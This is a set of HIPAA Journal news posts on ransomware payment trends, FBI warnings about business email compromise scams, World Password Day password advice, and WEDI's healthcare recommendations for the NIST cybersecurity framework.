The average ransom payment in ransomware attacks fell by 34% in Q1, 2022, from an all-time high in Q4, 2021, according to ransomware incident response firm Coveware. The average ransom payment in Q1, 2022 was $211,259 and the median ransom payment was $73,906.

The fall in total ransom payments has been attributed to several factors. Coveware suggests ransomware gangs have been targeting smaller organizations and issuing lower ransom demands, due to the increased scrutiny by law enforcement when attacks are conducted on large enterprises. The median company size has been falling since Q4, 2020, and is now companies with around 160 employees. This appears to be the sweet spot, where the companies have sufficient revenues to allow sizable ransoms to be paid, but not so large that attacks will result in considerable scrutiny by law enforcement.

Another reason why total ransom payments have fallen is fewer victims of ransomware attacks have been paying the ransom. The number of victims of ransomware attacks that pay the ransom has been steadily declining, from 85% of victims in Q1 2019 to 46% of victims in Q1, 2022. Also, some of the most prolific ransomware operations have gone quiet, such as Maze and REvil (Sodinokibi).

Conti and LockBit are the most prolific ransomware operations, accounting for 16.1% and 14.9% of ransomware attacks respectively, followed by BlackCat/Alphv (7.1%), Hive (5.4%), and AvosLocker (4.8%). Coveware suggests that the affiliates who work with ransomware-as-a-service operations appear to be less keen to work with large RaaS groups, as those groups are often targeted by law enforcement. It is now common for affiliates to try smaller RaaS operations or even develop their own ransomware variants from leaked source code.

The most common attack vectors in ransomware attacks are phishing, Remote Desktop Protocol connections, and exploiting unpatched vulnerabilities in software and operating systems. Coveware has tracked an increase in other attack vectors since Q2, 2021, such as social engineering and the direct compromising of insiders. Social engineering attacks are similar to phishing but are highly targeted and often involve priming or grooming targeted employees before convincing them to provide access to the network. There has also been an increase in lone wolf attackers. Coveware identified the trend in late 2021, and it has continued throughout Q1, 2022. Attacks by these threat actors are often conducted on companies that have far better security than the average ransomware victim, such as multi-factor authentication properly enabled for all employees and critical resources.

In late 2019, the Maze ransomware operation started using double extortion tactics, where data is stolen from victims before files are encrypted. Payment must then be made for the decryptor and to prevent the publication or sale of stolen data. These tactics were rapidly adopted by many ransomware operations and became the norm, although there was a decline in attacks involving encryption and extortion in Q1, 2022. Double extortion was used in 84% of attacks in Q4, 2021, and 77% of attacks in Q1, 2022. While double extortion is likely to continue to be extensively used in attacks for the foreseeable future, Coveware expects the shift from data encryption to data extortion to continue, as data theft and naming and shaming victims are less likely to attract the attention of law enforcement. “Data theft without encryption results in no operational disruption but preserves the ability of the threat actor to extort the victim. We expect this shift from Big Game Hunting to Big Shame Hunting to continue,” explained Coveware in the report.

Coveware warned about paying the ransom to prevent the publication or sale of data, as there are no guarantees that payment will result in data deletion. In 63% of attacks where a ransom was paid to prevent publication or sale of stolen data, the attackers provided no proof of data deletion. In the remaining attacks where proof was provided, it could easily have been faked. When videos, screenshots, live screen shares, or deletion logs are provided as proof, victims must trust that a copy of the data has not been made. “In one notable case, we observed a threat actor explicitly state that they would not be deleting the stolen data if paid, and would keep it for future leverage against the victim,” said Coveware.

The post Average Ransom Payment Dropped by 34% in Q1, 2022 appeared first on HIPAA Journal.

The Federal Bureau of Investigation (FBI) has issued a public service announcement warning about the threat of Business Email Compromise/Email Account Compromise (BEC/EAC) scams. The number of attacks reported to the FBI Internet Crime Complaint Center (IC3) and the amount of money lost to these scams continues to grow each year, with losses to BEC/EAC scams increasing 65% between July 2019 and December 2021.

BEC/EAC scams are the leading cause of losses to cybercrime. Between June 2016 and December 2021, IC3 received 241,206 complaints about domestic and international BEC/EAC attacks with reported losses of more than $43.3 billion. The IC3 2021 Internet Crime Report shows victims reported losses of $2.4 billion in 2021 across 19,954 complaints – around one-third of all losses to cybercrime in 2021. The actual losses to these scams are undoubtedly far higher, as many victims do not report the scams to the FBI, especially if the losses are relatively small.

BEC/EAC scams involve compromising email accounts and using them to send emails to businesses and individuals who perform legitimate transfers of funds requesting fraudulent transfers or changes to bank account information for upcoming payments. Statistical data shows the destination accounts for these transfers are most commonly overseas. The FBI says fraudulent transfers were made to banks in 140 countries, with Thailand topping the list followed by Hong Kong, China, Mexico, and Singapore.

The number of complaints about BEC/EAC scams involving cryptocurrencies has been growing. BEC/EAC scams involving cryptocurrencies started to be received by IC3 in 2018 when losses of less than $5 million. In 2021, cryptocurrency losses from BEC/EAC scams of $40 million were reported.

While it is common for scammers to target large enterprises that routinely perform transfers of millions of dollars, businesses of all sizes have been targeted including small local firms as well as individuals. The FBI says scams have been reported domestically in all 50 states, and reports have been received from victims in 177 countries.

BEC/EAC scams are conducted frequently because they have a high success rate and the ROI is so high. Fraudulent transfers are often for hundreds of thousands or millions of dollars, and the high success rate is due to the abuse of trust. The emails requesting transfers come from the email accounts of trusted individuals, such as company executives, vendors, and business partners, and the requests for transfers or bank account changes are often not questioned. The scams can also target sensitive data, such as the personally identifiable information of employees in W-2 forms.

Businesses and individuals should take steps to protect against BEC/EAC scams. These scams often start with phishing emails to obtain credentials to email accounts, so implementing a spam filtering solution to block the initial phishing emails will help to prevent email accounts from being compromised. 2-factor authentication should also be implemented to prevent stolen credentials from being used to access email accounts. Password policies should be implemented and enforced to prevent weak passwords from being set, which are vulnerable to brute force attacks.

Businesses should conduct security awareness training to teach employees how to recognize phishing emails and BEC/EAC scams and condition them to be wary of any email that requests login credentials or PII of any kind. The emails may appear to have been sent by trusted individuals and the reason for providing information often appears legitimate.

It is important to verify the email address used to send emails to ensure that the sender’s name and email address match, and to carefully check any URLs in emails to make sure they are associated with the business or individual they claim to be from. Employees should be alert to hyperlinks that may contain misspellings of the actual domain name. Employees’ computers and corporate-issued mobile devices should be configured to allow full email extensions to be viewed.

Since these scams often involve compromised internal email accounts and those of vendors, it is important to use secondary channels or two-factor authentication to verify requests for changes to account information and wire transfers, and businesses and individuals should monitor their financial accounts closely for irregularities such as missing deposits.

Victims of BEC/EAC scams should immediately report the incidents to their financial institution and request a recall of funds, and should also file a complaint with IC3. IC3’s Recovery Assist Team initiated the Financial Fraud Kill Chain (FFKC) in 2021 on 1,726 BEC complaints involving domestic to domestic transactions with potential losses of $443,448,237 and achieved a 74% success rate, freezing funds totaling $329 million.

The post FBI Issues Warning About BEC Scams as Losses Increase to $43 Billion appeared first on HIPAA Journal.

Thursday, May 2, 2024, is World Password Day. Established in 2013, the event is observed on the first Thursday of May with the goal of improving awareness of the importance of creating complex and unique passwords and adopting password best practices to keep sensitive information private and confidential.

Passwords were first used to protect accounts against unauthorized access in computing environments in the 1960s. In 1961, researchers at the Massachusetts Institute of Technology (MIT) started using the Compatible Time-Sharing System (CTSS). The system ran on an IBM 709 and users could access the system through a dumb terminal, with passwords used to prevent unauthorized access to users’ personal files.

The system is widely believed to be the first to use passwords and was also one of the first to experience a password breach. In the mid-1960s, MIT Ph.D. researcher Allan Scherr needed more than his allotted 4-hour CTSS time to run performance simulations he had designed for the computer system. He discovered a way to print out all passwords stored in the system and used the passwords to gain extra time.

Passwords are now the most common way to secure accounts and while passwordless authentication, such as biometric identifiers and single sign-on, are becoming more popular, in the short to medium term passwords are likely to remain the most widely used way of authenticating users and preventing unauthorized account access.

The Importance of Creating Strong Passwords

The use of passwords carries security risks, which World Password Day aims to address. One of the most common ways for hackers to gain access to accounts is to use stolen passwords. Phishing is used to target employees and trick them into disclosing their passwords, either via email, phone (vishing), or text message (SMiShing). Adopting 2-factor authentication will help to stop these attacks from succeeding. According to Microsoft, 2-factor authentication blocks more than 99% of automated attacks on accounts.

Hackers also use brute force tactics to guess weak passwords and take advantage of default credentials that have not been changed. If rate limiting is not implemented to lock accounts after a set number of failed login attempts, weak passwords can be guessed in a fraction of a second. Even strong passwords can be guessed in seconds or minutes if they are not sufficiently long.

In 2020, Hive Systems started publishing charts showing the time it takes for a hacker to brute force a password using a powerful, commercially available computer, and each year the table is updated to account for advances in computing technology. The chart clearly demonstrates the importance of creating strong passwords that include a combination of numbers, symbols, and upper- and lower-case letters and ensuring passwords contain enough characters. We recommend a minimum password length of 14 characters.

How long does it take to hack a password in 2024 – Source Hive Systems

Password Management Shortcuts Weaken Security

Creating and remembering long, complex passwords is difficult for most people, and it is made even harder due to the need to create passwords to protect multiple accounts – A study by NordPass suggests the average person has around 100 passwords. Many people struggle to create and remember more than one strong and unique password, so with so many accounts to secure it is unsurprising that people take shortcuts, but those password management shortcuts significantly weaken password security.

It is common for users to avoid creating unique passwords and they end up reusing the same password for multiple accounts. The problem with this is that if the password is compromised on one platform, either through brute force tactics, a phishing scam, or another method, all other accounts that use that password are at risk. Hackers take advantage of this common bad practice using a technique called credential stuffing. If they obtain a list of usernames and passwords from a data breach, they will attempt to access accounts on other unrelated platforms using those username and password combinations. This method only succeeds if there has been password reuse.

Changing passwords slightly by adding a number or substituting characters when creating new accounts isn’t much more secure, and will leave accounts susceptible to brute force attacks. If a hacker obtains a username and password combination, various permutations of that password will be attempted with that username. Writing down passwords is also a very bad idea.

Many businesses have implemented minimum complexity requirements for passwords, stipulating a minimum password length and composition requirements, yet it is common for employees to take shortcuts to make passwords easier to remember. It is possible to create a password that meets minimum complexity requirements yet is still incredibly weak. ‘Password’ is still one of the most commonly used passwords and it is usually the first one that is attempted when trying to hack an account. ‘P4ssw0rd!’ would meet the password complexity requirements imposed on many platforms, but it is still incredibly weak and offers next to no protection.

Global Password Management Survey Reveals Poor Password Management Practices

The 2024 Global Password Management Survey conducted by password management solution provider Bitwarden ahead of World Password Day confirms that extremely risky password practices are still incredibly common. The survey was conducted on more than 2,400 Internet users in the United States, United Kingdom, Australia, Germany, France, and Japan and asked questions about personal passwords, password habits at work, and the strategies that are adopted for managing passwords.

Despite the risks, 84% of respondents admitted to reusing passwords for multiple accounts, down from 90% in 2022. In 2024, 33% of respondents said they reuse passwords on 1-5 sites, 26% reuse passwords on 6-10 sites, 15% reuse passwords on 11-15 sites, and 11% use the same password to secure more than 15 sites. Password reuse is most common on personal accounts; however, 47% of respondents said they reuse passwords at work very (14%) or somewhat (33%) frequently.

Password manager use is increasing. 32% of respondents said they use a password manager at home, up from 30% last year, but only 30% of respondents said they use a password manager at work. 54% of respondents said they rely on memory to manage passwords at home, which suggests that the passwords they set are easy to remember and therefore not particularly complex. 36% of respondents said they use personal information in their passwords, and 60% said that the personal information they use in their passwords can be found in their social media accounts.

Workplace security habits were rated as generally secure by 53% of respondents; with 37% of respondents admitting to somewhat (31%) or very (6%) risky workplace security habits. Risky security habits were the use of weak or personal information-based passwords (39%), storing work passwords insecurely (35%), not using 2-factor authentication (2FA) or multifactor authentication (MFA) (33%), and sharing passwords insecurely (32%).

Account security can be greatly improved with 2FA/MFA, and while there are strong feelings that the additional authentication makes accessing accounts cumbersome, 2FA/MFA is now being widely adopted. 80% of respondents said they use 2FA for personal accounts, up from 66% in 2023, and only 28% of respondents said they do not use 2FA or MFA at work. Awareness of 2FA and MFA is improving, with only 7% of users saying they are not sure what those terms mean, down from 22% last year. While any form of MFA is better than none, SMS-based MFA is still the most common despite this method being the least secure. 65% of respondents said they used SMS-based MFA at home and 50% said SMS-based MFA was used at work.

2FA/MFA is vital for protecting accounts. In the event of a phishing attack where an employee discloses their password, 2FA/MFA can prevent that password from granting access to the account, thus preventing a costly data breach. However, while any form of 2FA/MFA is better than single-factor authentication, phishing-resistant MFA provides the best protection. Threat actors are now using phishing kits capable of stealing session cookies and MFA codes, thus bypassing MFA.

Password Security and Management Tips

World Password Day 2024 is the perfect time to assess password security and take steps to ensure that all accounts are properly secured with strong and unique passwords, and start following password best practices:

• Ensure a strong, unique password is set for all accounts
• Use a combination of upper- and lower-case letters, numbers, and symbols in passwords
• Use easy-to-remember passphrases rather than passwords, that have a minimum of 14 characters
• Never reuse passwords on multiple accounts
• Don’t use information in passwords that can be found in social media profiles (DOB, spouse or pet name, etc.) or is known to others
• Ensure 2-factor authentication is set up, especially for accounts containing sensitive data
• Use a secure password generator to generate random strings of characters
• Avoid using dictionary words and commonly used passwords
• Use a password manager for creating strong passwords and secure storage, and set a long and complex passphrase for your password vault.

The post World Password Day 2024 – Password Tips and Best Practices appeared first on HIPAA Journal.

The Workgroup for Electronic Data Interchange (WEDI) has responded to the request for information from the National Institute of Standards and Technology (NIST) and has made several recommendations for improving the NIST cybersecurity framework and supply chain risk management guidance to help healthcare organizations deal with some of the most pressing threats facing the sector.

Ransomware is one of the main threats facing the healthcare industry, and that is unlikely to change in the short to medium term.  To help healthcare organizations deal with the threat, WEDI has suggested NIST increase its focus on ransomware and address the issue of ransomware directly in the cybersecurity framework. NIST published a new ransomware resource in February 2022, which contains valuable information on protecting against, detecting, responding to, and recovering from ransomware attacks. WEDI feels the inclusion of ransomware within the cybersecurity framework will expand the reach and impact of the resource.

WEDI has also recommended the inclusion of specific case studies of healthcare organizations that have experienced a ransomware attack, updating the framework to define contingency planning strategies based on the type of healthcare organization and issue guidance with a focus on contingency planning, execution, and recovery. Ransomware attacks on healthcare providers carry risks that are not applicable to other entities. Further guidance in this area would be of great benefit to healthcare providers and could help to minimize disruption and patient safety issues.

Healthcare organizations have been developing patient access Application Programming Interfaces (APIs) and applications (apps) which are covered by HIPAA, and are therefore required to incorporate safeguards to ensure the privacy and security of any healthcare data they contain, but WEDI has drawn attention to the lack of robust privacy standards that are applicable to third party health apps that are not covered by HIPAA. WEDI says there is a need for a national security framework to ensure that health care data obtained by third-party apps are held to appropriate privacy and security standards.

The number of risks and vulnerabilities to portable and implantable medical devices has grown at an incredible rate in recent years and those risks are likely to grow exponentially in the years to come. WEDI has recommended NIST address cybersecurity issues related to these devices directly in the cybersecurity framework, and also address the issue of insider threats. Many healthcare data breaches are caused by insider threats such as lost electronic devices, phishing and social engineering attacks. WEDI suggests these issues and security awareness training should be addressed in the cybersecurity framework.

WEDI has also recommended NIST develop a version of its cybersecurity framework that is targeted at smaller healthcare organizations, which do not have the resources available to stay informed about the latest security developments and implement the latest security measures and protocols. A version of the framework that is more focused on the threats faced by smaller organizations would be of great benefit and should include realistic proactive steps that can be taken by small healthcare organizations to mitigate risks.

The post WEDI Makes Healthcare-Specific Recommendations for Improving the NIST Cybersecurity Framework appeared first on HIPAA Journal.